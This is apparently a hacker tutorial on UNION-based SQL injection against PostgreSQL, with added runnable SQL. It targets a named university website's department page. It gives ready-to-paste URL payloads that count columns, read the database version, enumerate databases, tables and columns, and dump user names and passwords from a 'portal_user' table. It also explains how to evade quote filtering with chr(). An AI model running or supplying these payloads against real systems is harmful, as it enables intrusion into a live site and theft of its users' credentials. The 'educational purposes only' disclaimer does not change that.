NOTE: This tutorial is for educational purposes only.
You can verify this vulnerability (as Net_Spy, a good SQL injector, says) by the error message, which gives away which database is behind the page:
Errors
MySQL: the message mentions MySQL
or
MS SQL: the message mentions SQL
or
Oracle: the message starts with ORA
or
MS Access: the message mentions Jet
or
PostgreSQL (through PHP): Warning: pg_exec () [function.pg-exec]
But in our case the page is blank (I think that is the worst case).
Some basics for it as well:
|| is the concatenation operator in PostgreSQL (just like Oracle).
We can use LIMIT here too, but with one addition, OFFSET, when the page displays results only one at a time.
The rest is, I think, the same as MySQL.
Now the column count.
Finding the column count is the same as in MySQL, MSSQL and Oracle: use the ORDER BY clause.
Comments in PostgreSQL
-- This is a standard SQL comment
/* this is
 * the multi-line comment syntax
 */
CASTING in PostgreSQL
CAST ( 'string' AS type )
or, with PostgreSQL's shorthand, 'string'::type
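The building blocks above, as an added example that is not part of the original tutorial: concatenation with casts, LIMIT/OFFSET stepping, spelling a string with chr() when quotes are filtered, and the two comment forms. It runs as-is in psql against any PostgreSQL database; the numbers and strings are constructed and nothing here touches a target.

```sql
-- Added example (not from the tutorial): the PostgreSQL pieces the injection
-- relies on. Runnable in psql against any database; all values are constructed.

-- Concatenation with ||: cast non-text operands to text first.
-- CAST(... AS type) and the ::type shorthand mean the same thing.
SELECT 'id='||CAST(42 AS text)||', name='||'alice';
SELECT 'id='||42::text||', name='||'alice';

-- LIMIT is how many rows to keep, OFFSET how many rows to skip first.
-- To walk a result set one row per request, keep LIMIT 1 and step
-- OFFSET 0, 1, 2, ...  Raising LIMIT along with OFFSET returns more rows,
-- not the next row.
SELECT n FROM generate_series(1, 5) AS n LIMIT 1 OFFSET 0;  -- keep 1 row after skipping 0
SELECT n FROM generate_series(1, 5) AS n LIMIT 1 OFFSET 1;  -- keep 1 row after skipping 1
SELECT n FROM generate_series(1, 5) AS n LIMIT 2 OFFSET 2;  -- keep 2 rows after skipping 2

-- chr(): build a string without any quote character, for when the
-- application filters or escapes single quotes. This chain spells portal_user.
SELECT chr(112)||chr(111)||chr(114)||chr(116)||chr(97)||chr(108)
     ||chr(95)||chr(117)||chr(115)||chr(101)||chr(114);

-- Comments: "--" runs to end of line, "/* */" may span lines. In a URL the
-- trailing "--+" decodes to "-- " so the rest of the original query is
-- thrown away.
SELECT version() -- everything after this marker is ignored
;
SELECT current_database(), current_user, /* an inline,
   multi-line comment */ current_schema();
```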
Now let's inject the site.
With the ORDER BY clause we learned that there are 8 columns in the SELECT statement before the UNION: ORDER BY 8 renders the page normally, ORDER BY 9 gives the blank error page.
OK, now UNION SELECT with 8 columns.
Here we use null, as in MSSQL or Oracle, because we don't know the data types: unlike MySQL, these databases check that every UNIONed column has a compatible type, and null fits any of them.
So put a string in place of one null at a time, and you will see the string on the web page when that column's data type is a string type (text/varchar/char).
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,'Ch3rnoby1 Black Hat',null,null,null,null,null,null--+
Now for version():
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,version(),null,null,null,null,null,null--+
For the database names (pg_database lists every database in the cluster; current_database() gives the one you are connected to):
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database--+
If this shows only one row, we can use LIMIT together with OFFSET, like this:
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1 OFFSET 1--+
Now just increase the OFFSET to find all the other databases.
With LIMIT 1, OFFSET shows one row at a time: OFFSET skips that many rows before the single row is returned.
e.g.
LIMIT 1 OFFSET 0 =====> first database
LIMIT 1 OFFSET 1 =====> second database (next to the first)
LIMIT 1 OFFSET 2 =====> third database
(LIMIT 2 OFFSET 2 would return two rows, the third and the fourth, which does not help when the page renders only one.)
or, starting from the first row,
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1--+
and likewise increase the OFFSET (keeping LIMIT 1) to see the other databases.
Now enumerating table names.
This shows all tables in all schemas of the current database (in PostgreSQL, information_schema only covers the database you are connected to, not the other databases in the cluster):
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables--+
To see only the tables of the current schema (normally public, where the application's own tables usually live) we use:
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables where table_schema=current_schema()--+
Now the column names.
This shows all columns of all tables in the current database:
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns--+
To see only the columns of a specific table we use:
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns where table_name='portal_user'--+
Now, if the quoted 'portal_user' does not work (the single quotes are filtered), you need to build the table name from CHR() calls joined with ||, exactly as with Oracle's CHR(); PostgreSQL has the same chr() function.
You cannot use a hex value anywhere in a PostgreSQL query (I have tested it; you can check for yourself too).
Now dumping data.
This is the same as Oracle: concatenate the columns with || and a separator so one echoed column carries several values.
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,(user_name||'::::'||user_password),null,null,null,null,null,null from portal_user--+
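The whole enumeration chain from version() to the dump, as an added example that is not from the original tutorial. Each statement is the UNION's right-hand side as the database runs it once the injected quote closes the deptid literal. The application's own SELECT, its table and its eight column types are unknown, so the first statement uses a constructed stand-in for that left side; portal_user, user_name and user_password are the names the tutorial found and are assumed here to be text columns. The string_agg variant goes beyond the page and needs PostgreSQL 9.0 or later.

```sql
-- Added example (not from the tutorial): the injected UNION branches as the
-- server executes them. The left side is a constructed stand-in; the target's
-- real query is unknown. portal_user/user_name/user_password are assumed text.

-- Full shape of one injected query. The stand-in left side returns no rows
-- (WHERE false), so every row the page renders comes from the UNION branch.
-- Column 2 is the one the page echoes, found by substituting a string for
-- each NULL in turn.
SELECT 0, 'stand-in'::text, NULL::text, NULL::text, NULL::text, NULL::text, NULL::text, NULL::text
WHERE false
UNION SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL;

-- Databases, one row per request: keep LIMIT 1 and step OFFSET 0, 1, 2, ...
-- until the page comes back empty. datname has type name, so cast it.
SELECT NULL, datname::text, NULL, NULL, NULL, NULL, NULL, NULL
  FROM pg_database ORDER BY 2 LIMIT 1 OFFSET 0;
SELECT NULL, datname::text, NULL, NULL, NULL, NULL, NULL, NULL
  FROM pg_database ORDER BY 2 LIMIT 1 OFFSET 1;
-- The same list in a single request (string_agg exists from PostgreSQL 9.0).
SELECT NULL, string_agg(datname::text, ','), NULL, NULL, NULL, NULL, NULL, NULL
  FROM pg_database;

-- Tables: information_schema only covers the current database, so skip the
-- catalog schemas rather than trying to select another database.
SELECT NULL, table_schema::text||'.'||table_name::text, NULL, NULL, NULL, NULL, NULL, NULL
  FROM information_schema.tables
 WHERE table_schema NOT IN ('pg_catalog', 'information_schema')
 ORDER BY 2 LIMIT 1 OFFSET 0;

-- Columns of one table, with the name spelled by chr() in case quotes are
-- filtered (the chain is portal_user). data_type says what to cast later.
SELECT NULL, column_name::text||' '||data_type::text, NULL, NULL, NULL, NULL, NULL, NULL
  FROM information_schema.columns
 WHERE table_name::text = chr(112)||chr(111)||chr(114)||chr(116)||chr(97)||chr(108)
                        ||chr(95)||chr(117)||chr(115)||chr(101)||chr(114)
 ORDER BY 2 LIMIT 1 OFFSET 0;

-- Dump: join the columns with a separator that cannot occur in the data,
-- casting each to text so || is defined whatever the column types turn out to be.
SELECT NULL, user_name::text||'::::'||user_password::text, NULL, NULL, NULL, NULL, NULL, NULL
  FROM portal_user ORDER BY 2 LIMIT 1 OFFSET 0;
```

Two things to keep in mind when pasting these into the URL: ORDER BY, LIMIT and OFFSET written after the last branch apply to the whole UNION, so any row the application's own WHERE clause still matches (deptid='66' here) is counted in the OFFSET, and ORDER BY must use a column number (ORDER BY 2), because in a UNION it may only reference output columns.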
For reference:
http://www.postgresql.org/docs/8.0/static/sql-syntax.html
Tutorial By Pk Injector